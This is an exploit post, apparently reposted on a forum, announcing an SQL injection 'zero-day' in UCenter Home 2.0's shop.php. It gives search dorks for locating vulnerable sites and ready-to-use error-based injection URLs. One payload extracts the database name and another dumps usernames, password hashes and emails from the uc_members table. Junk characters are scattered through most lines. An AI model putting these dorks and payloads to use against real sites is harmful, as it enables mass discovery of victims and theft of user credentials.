0 ^, e: g/ _6 U8 Y$ f8 r' E
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ - S' F; R4 B& y5 N! r ~3 j
3 Q- H6 j4 [1 ^- e6 ~ ! v# L* ^3 k% O" O3 Q. m2 l
6 y4 n4 F% V& ]8 l. ~: Y" z
*/ Author : KnocKout 0 n+ b5 Q' t7 s0 x3 p# Z6 U
1 s7 q, T/ v4 r+ l2 d9 q( ~
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers / U. F* p2 a! F' F5 o% [" Y
8 N$ C3 T( ~ O% Q4 w*/ Contact: knockoutr@msn.com
0 ?/ ~, |5 x. V. @" a1 q ]. b7 S; x7 C: L* A. g5 S" k
*/ Cyber-Warrior.org/CWKnocKout
% A( @0 q: ?" a1 q7 y4 Z* O0 y8 f% K
- m$ z( k: ?! F) u4 z__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 s. P* ?% F& A7 y0 h+ @; v7 Z* D$ @) T) ~" G. P- u
Script : UCenter Home
n8 U# |1 D! ~ i) a# s2 V+ }7 w4 s
~: B! O5 I; l, @Version : 2.0
" v" I/ k# M( ^/ O
: T$ w6 R, Z+ K; T9 f0 N, WScript HomePage : http://u.discuz.net/ : [) v4 E6 Y8 w: H7 N
: \5 \: w ]7 {" @( |6 r
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 4 g$ H8 v- s/ X1 ?% |2 q7 k0 O
* j+ x( {$ ?$ t2 h) {7 Y1 K. d1 SDork : Powered by UCenter inurl:shop.php?ac=view
: p, F+ v2 g ~& _) E2 D
, f: c) p7 k7 i' \$ l/ @Dork 2 : inurl:shop.php?ac=view&shopid=
! c* P$ t" s+ M% Y, ^1 |6 K4 Y
- v' U3 O9 c6 t__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; A/ S* q) p: \; X2 W# e$ i8 \2 @- A. \9 s4 Q: |: D6 f
Vuln file : Shop.php
4 S }1 J) Y/ s
& K) L7 e6 n+ L R0 Gvalue's : (?)ac=view&shopid=
8 P0 `: ]7 {1 w* z5 N% Q+ B( F. T% ^# s) x y6 t, L v! S
Vulnerable Style : SQL Injection (MySQL Error Based) - f9 b" v, f$ r# K S$ R4 p
, }2 u6 w3 G8 q/ {* S1 d- i
Need Metarials : Hex Conversion " K* F- t7 S! U! }
6 d6 ]+ K6 q6 p; A5 j7 x H+ x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 }1 i5 X/ i, C
" R B( s. N, y. \9 r, ~) U- g
Your Need victim Database name. 7 Z9 p) q: N# X+ a0 Y
/ p5 T2 s3 R4 P5 d" b2 h% L5 E
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ) l# M) r8 H* t6 l l
$ b% v. v- \) K3 a- }
..
& E; ~4 R$ `- f$ e _! O
" W5 R2 R) H! FDB : Okey. % k+ i1 y; D. s6 x+ _, R( ]
8 T& g# c3 L; [" s
your edit DB `[TARGET DB NAME]` 3 ?- D$ D6 m+ ]) L
7 q+ ?2 C" n) p) q$ F, aExample : 'hiwir1_ucenter' + X* p0 J& @; o4 ^, N
9 f3 c, f% L7 x. J% X/ TEdit : Okey.
6 X: k3 B' V( ~& ]4 m$ ~7 a! x7 M& w, l& S7 b/ N% G
Your use Hex conversion. And edit Your SQL Injection Exploit..
4 }% P$ i0 l4 X7 M0 i
, Y1 U4 |* E% W
. v% R" T5 H. k9 [. f4 U2 i% ~$ N( {( s: H7 b. ?
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2 F l1 L* G* T |
发表于 2013-2-27 21:31:31
收藏
支持
反对